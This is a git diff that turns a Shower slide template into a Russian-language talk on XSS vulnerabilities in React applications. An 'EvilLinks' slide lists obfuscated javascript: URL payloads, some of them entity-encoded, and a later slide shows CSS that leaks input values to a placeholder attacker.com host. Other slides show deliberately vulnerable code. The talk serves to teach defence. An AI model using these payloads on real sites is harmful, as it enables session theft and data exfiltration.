--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-    <title>Shower Presentation Engine</title>
+    <title>Уязвимости вашего React-приложения</title>
     <meta charset="utf-8">
     <meta name="viewport" content="width=device-width, initial-scale=1">
     <link rel="stylesheet" href="node_modules/shower-ribbon/styles/styles.css">
@@ -9,202 +9,168 @@
         .shower {
             --slide-ratio: calc(16 / 9);
         }
+
+        .center {
+            display: flex;
+            align-items: center;
+            justify-content: center;
+        }
     </style>
 </head>
 <body class="shower list">
 
     <header class="caption">
-        <h1>Shower Presentation Engine</h1>
-        <p>Yours Truly, Famous Inc.</p>
+        <h1>Уязвимости вашего React-приложения</h1>
     </header>
 
-    <section class="slide" id="cover">
-        <h2>Shower Presentation Engine</h2>
-        <p>Brought to you by <a href="http://pepelsbey.net">Vadim Makeev</a></p>
-        <figure>
-            <img class="cover" src="pictures/cover.jpg" alt="Hands on the orange typewriter in a park">
-            <figcaption class="copyright right white">
-                <a href="http://fiftyfootshadows.net/">© John Carey</a>
-            </figcaption>
-        </figure>
+    <section class="slide center" id="cover">
+        <h2>Уязвимости вашего React-приложения</h2>
+
         <style>
             #cover h2 {
-                margin: 30px 0 0;
-                color: white;
-                text-align: center;
-                font-size: 70px;
-            }
-
-            #cover p {
-                margin: 10px 0 0;
-                text-align: center;
-                color: white;
-                font-style: italic;
-                font-size: 20px;
-            }
-
-            #cover p a {
-                color: white;
+                font-size: 55px;
             }
         </style>
     </section>
 
     <section class="slide">
-        <h2>Shower key features</h2>
-        <ol>
-            <li>Built on HTML, CSS and JavaScript</li>
-            <li>Works in all modern browsers</li>
-            <li>Themes are separated from engine</li>
-            <li>Fully keyboard accessible</li>
-            <li>Printable to PDF</li>
-        </ol>
-        <p class="note">Shower ['ʃəuə] noun. A person or thing that shows.</p>
+        <h2>Что такое XSS?</h2>
+        <blockquote class="next">
+            <b>XSS</b> (Cross-Site Scripting) — тип атаки на веб-системы, заключающийся во внедрении в выдаваемую
+            веб-системой страницу вредоносного кода (который будет выполнен на компьютере
+            пользователя при открытии им этой страницы)
+        </blockquote>
     </section>
 
     <section class="slide">
-        <h2>Plain text on your slides</h2>
-        <p>Lorem ipsum dolor sit amet, consectetur <a href="#4">adipisicing</a> elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, <em>quis nostrud</em> exercitation ullamco laboris <strong>nisi ut aliquip</strong> ex ea commodo consequat. Duis aute irure <i>dolor</i> in reprehenderit in voluptate velit esse cillum <b>dolore</b> eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in <code>&lt;culpa&gt;</code> qui officia deserunt mollit anim id est laborum.</p>
+        <h2>Почему alert(1) на странице — страшно?</h2>
+        <ul class="next">
+            <li>украденные авторизационные токены
+            <li>выполнение действий от имени пользователей
+            <li>испорченый внешний вид и функциональность сайта
+        </ul>
     </section>
 
     <section class="slide">
-        <h2>Two columns if you like</h2>
-        <div class="columns two">
-            <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.</p>
-            <p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia.</p>
-        </div>
+        <h2>«Но у меня же Реакт! Я слышал, он безопасный»</h2>
+        <a href="https://reactjs.org/docs/introducing-jsx.html" class="next"
+           target="_blank"><img src="pictures/react-doc.png" alt="react documentation screenshot"
+                                style="max-width: 80%"></a>
     </section>
 
     <section class="slide">
-        <h2>All kind of lists</h2>
-        <ol>
-            <li>Simple lists are marked with bullets</li>
-            <li>Ordered lists begin with a number</li>
-            <li>You can even nest lists one inside another
-                <ul>
-                    <li>Or mix their types</li>
-                    <li>But do not go too far</li>
-                    <li>Otherwise audience will be bored</li>
-                </ul>
-            </li>
-            <li>Look, seven rows exactly!</li>
-        </ol>
-    </section>
-
-    <section class="slide">
-        <h2>Serious citations</h2>
-        <figure>
-            <blockquote>
-                <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia.</p>
-            </blockquote>
-            <figcaption>Marcus Tullius Cicero</figcaption>
-        </figure>
-    </section>
-
-    <section class="slide">
-        <h2>Code samples</h2>
+        <h2>От чего Реакт спасает</h2>
         <pre>
-            <code>&lt;!DOCTYPE html&gt;</code>
-            <code class="mark">&lt;html lang="en"&gt;</code>
-            <code><mark>&lt;head&gt;</mark> <span class="comment">&lt;!--Comment--&gt;</span></code>
-            <code>    &lt;title&gt;Shower&lt;/title&gt;</code>
-            <code>    &lt;meta charset="<mark class="important">UTF-8</mark>"&gt;</code>
-            <code>    &lt;link rel="stylesheet" href="screen.css"&gt;</code>
-            <code><mark>&lt;/head&gt;</mark></code>
+            <code>return (</code>
+            <code>  &lt;input onChange={(_, value) => this.setState({value})}&gt;</code>
+            <code>  Привет, {this.state.value}!</code>
+            <code>)</code>
+        </pre>
+    </section>
+
+    <section class="slide center">
+        <h3>XSS не ограничивается вставкой тега script в разметку</h3>
+    </section>
+
+    <section class="slide center">
+        <h2>Самые опасные ситуации</h2>
+    </section>
+
+    <section class="slide">
+        <h2>Вставка ссылок</h2>
+        <pre>
+            <code>return (</code>
+            <code>  &lt;input onChange={e => this.setState({link: e.target.value}) } /&gt;</code>
+            <code>  &lt;a href={this.state.link}&gt;Нажми меня&lt;/a&gt;</code>
+            <code>)</code>
         </pre>
     </section>
 
     <section class="slide">
-        <h2>Even tables</h2>
-        <table>
-        <tr>
-            <th scope="col">Locavore</th>
-            <th>Umami</th>
-            <th>Helvetica</th>
-            <th>Vegan</th>
-        </tr>
-        <tr>
-            <th scope="row">Fingerstache</th>
-            <td>Kale</td>
-            <td>Chips</td>
-            <td>Keytar</td>
-        </tr>
-        <tr>
-            <th scope="row">Sriracha</th>
-            <td>Gluten-free</td>
-            <td>Ennui</td>
-            <td>Keffiyeh</td>
-        </tr>
-        <tr>
-            <th scope="row">Thundercats</th>
-            <td>Jean</td>
-            <td>Shorts</td>
-            <td>Biodiesel</td>
-        </tr>
-        <tr>
-            <th scope="row">Terry</th>
-            <td>Richardson</td>
-            <td>Swag</td>
-            <td>Blog</td>
-        </tr>
-        </table>
-        <p>It’s good to have information organized.</p>
+        <h2>EvilLinks</h2>
+        <ul>
+            <li>'javascript: alert(1)'
+            <li>'jav&amp;#x09;ascript:alert('XSS');'
+            <li>' &amp;#14;  javascript:alert('XSS');'
+            <li>&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29
+            <li>&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;
+            #0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041
+        </ul>
     </section>
 
-    <section class="slide" id="picture">
-        <h2>Pictures</h2>
-        <figure>
-            <img class="cover" src="pictures/picture.jpg" alt="Orange typewriter on a wooden table close-up">
-            <figcaption class="copyright right white">
-                <a href="http://fiftyfootshadows.net/">© John Carey</a>
-            </figcaption>
-        </figure>
-        <style>
-            #picture h2 {
-                color: white;
-            }
-        </style>
+    <section class="slide center">
+        <h2>dangerouslySetInnerHTML</h2>
+    </section>
+
+    <section class="slide center">
+        <h2>iframes</h2>
     </section>
 
     <section class="slide">
-        <h2 class="shout shrink">You can even shout this way</h2>
+        <h2>Вставка видео с youtube</h2>
+
+        <pre>
+            <code>&lt;iframe width="560" height="315"</code>
+            <code>  src="https://www.youtube.com/embed/GHhMJjPnezU" frameBorder="0"</code>
+            <code>  allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture"</code>
+            <code>  allowFullScreen /&gt;</code>
+        </pre>
+    </section>
+
+
+    <section class="slide center">
+        <h2>Передача управления другой бибилиотеке</h2>
     </section>
 
     <section class="slide">
-        <h2>Inner navigation</h2>
-        <ol>
-            <li>Lets you reveal list items one by one</li>
-            <li class="next">To keep some key points</li>
-            <li class="next">In secret from audience</li>
-            <li class="next">But it will work only once</li>
-            <li class="next">Nobody wants to see the same joke twice</li>
-        </ol>
+        <h2>Markdown</h2>
+
+        <ul>
+            <li class="next">Общее доверие библиотеке</li>
+            <li class="next">Работа библиотеки со ссылками</li>
+            <li class="next">Возможность вставлять теги: какие теги и какие у них атрибуты?</li>
+        </ul>
     </section>
 
-    <section class="slide" id="see-more">
-        <h2 class="shout">
-            <img src="pictures/logo.svg" alt="Shower logo">
-            <a href="https://github.com/shower/shower">See more on GitHub</a>
-        </h2>
-        <style>
-            #see-more h2 {
-                font-size: 100px
-            }
+    <section class="slide">
+        <h2>Когда делаешь что-то без фреймворка</h2>
 
-            #see-more img {
-                width: 0.72em;
-                height: 0.72em;
-            }
-        </style>
+        <pre>
+            <code>const wrp = document.getElementById('container');</code>
+            <code>wrp.<mark>innerHtml</mark> = <mark>location</mark>.pathname;</code>
+        </pre>
     </section>
 
-    <footer class="badge">
-        <a href="https://github.com/shower/shower">Fork me on GitHub</a>
-    </footer>
+    <section class="slide">
+        <h2>Подключение любой библиотеки</h2>
+
+        <p>Даже не делающей ничего с версткой</p>
+    </section>
+
+    <section class="slide">
+        <h2>Подключение библиотеки со стилями</h2>
+        <pre class="next">
+            <code>#form2 input[value$='a'] {</code>
+            <code>    background-image: url(https://attacker.com/?a);</code>
+            <code>}</code>
+        </pre>
+    </section>
+
+    <section class="slide">
+        <h2>Как от всего спастить?</h2>
+
+        <ul>
+            <li>Белые списки протоколов ссылок, атрибутов и тегов</li>
+            <li class="next">Недоверие к любому пользовательскому вводу, включая <code>window.location</code> и пришедшие с
+                сервера данные</li>
+            <li class="next">Content-Security Policy (CSP)</li>
+        </ul>
+    </section>
+
 
     <div class="progress"></div>
 
     <script src="node_modules/shower-core/shower.min.js"></script>
-    <!-- Copyright © 2018 Yours Truly, Famous Inc. -->
 
 </body>
 </html>
